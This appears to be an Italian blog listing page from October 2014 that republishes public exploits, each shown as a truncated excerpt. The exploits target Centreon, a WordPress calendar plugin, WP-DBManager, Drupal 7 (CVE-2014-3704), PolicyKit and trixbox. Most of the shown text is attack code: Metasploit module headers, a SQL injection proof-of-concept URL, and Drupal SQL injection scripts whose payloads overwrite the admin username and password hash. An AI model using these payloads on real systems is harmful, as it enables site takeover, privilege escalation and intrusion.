Dell SonicWall GMS v7.2.x – Persistent Web Vulnerability

24 ottobre 2014 - Fonte: http://www.mondounix.com
Document Title:
===============
Dell SonicWall GMS v7.2.x - Persistent Web Vulnerability
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1222
 
Release Date:
=============
2014-10-21
 
Vulnerability Laboratory ID (VL-ID):
====================================
1222
 
Common Vulnerability Scoring System:
====================================
3
 
Product & Service Introduction:
===============================
Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from...

Leggi il seguito »

Centreon SQL / Command Injection

24 ottobre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Centreon SQL and Command Injection',
      'Description'    => %q{
        This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
        Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command
        injection in the displayServiceStatus.php component, it is possible to execute arbitrary
 ...

Leggi il seguito »

WordPress CP Multi View Event Calendar 1.01 SQL Injection

24 ottobre 2014 - Fonte: http://www.mondounix.com
######################
 
# Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani 
 
# Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip
 
# Date : 2014-10-23
 
# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
 
# Description
 
CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability
 
calid variable is not sanitized.
 
######################
 
# PoC
 
http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1...

Leggi il seguito »

WordPress Database Manager 2.7.1 Command Injection / Credential Leak

22 ottobre 2014 - Fonte: http://www.mondounix.com
Title: Vulnerabilities in WordPress Database Manager v2.7.1
Author: Larry W. Cashdollar, @_larry0
Date: 10/13/2014
Download: https://wordpress.org/plugins/wp-dbmanager/
Downloads: 1,171,358
Vendor: Lester Chan, https://profiles.wordpress.org/gamerz/
Contacted: 10/13/2014, Vulnerabilities addressed in v2.7.2.
Full Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-dbmanager-2.7.1/index.html
CVE: 2014-8334,2014-8335
OSVDBID: 113508,113507,113509
 
Description: "Allows you to optimize database, repair database, backup database, restore database, delete backup database , drop/empty tables and run selected queries. Supports automatic scheduling of backing up, optimizing and repairing of database."
 
Vulnerability:...

Leggi il seguito »

Drupal Core 7.32 SQL Injection (python Version)

19 ottobre 2014 - Fonte: http://www.mondounix.com
#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
    print "host username password"
    print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
            +user \
            +"'+,+pass+%3d+'" \
  ...

Leggi il seguito »

Drupal Core 7.32 SQL Injection (PHP Version)

19 ottobre 2014 - Fonte: http://www.mondounix.com
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#
 
$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'"...

Leggi il seguito »

Linux PolicyKit Race Condition Privilege Escalation

18 ottobre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class Metasploit4 < Msf::Exploit::Local
  Rank = GreatRanking
 
  include Msf::Exploit::EXE
  include Msf::Post::File
 
  include Msf::Exploit::Local::Linux
 
  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Linux PolicyKit Race Condition Privilege Escalation',
      'Description'   => %q(
        A race condition flaw was found in the PolicyKit pkexec utility and polkitd
        daemon. A local user could use this flaw to appear as a privileged user to
        pkexec, allowing them to execute arbitrary commands as root by running
...

Leggi il seguito »

Fonality Trixbox CE 2.8.0.4 Command Execution

17 ottobre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/perl
#
# Title: Fonality trixbox CE remote root exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered & Coded: 2 June 2014
# Published: 17 October 2014
# MorXploit Research
# http://www.MorXploit.com
# Software: trixbox CE
# Version: trixbox-2.8.0.4.iso
# Vendor url: http://www.fonality.com/
# Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/
# Vulnerable file: maint/modules/home/index.php
#
# Description:
# maint/modules/home/index.php suffers from a command execution vulnerability, allowing an authenticated user to inject commands as the
# asterisk user which then can be leverged to root privilege through sudo.
#
# from /etc/sudoers:
## asterisk ALL =...

Leggi il seguito »

Drupal 7.X SQL Injection

17 ottobre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/python
#
# 
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational 
# purposes only and the author can not be held liable for 
# any kind of damages done whatsoever to your machine, 
# or damages caused by some other,creative application of this material.
# In any case you disagree with the above statement,stop here.
 
import hashlib, urllib2, optparse, random, sys
 
# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Calculate a non-truncated Drupal...

Leggi il seguito »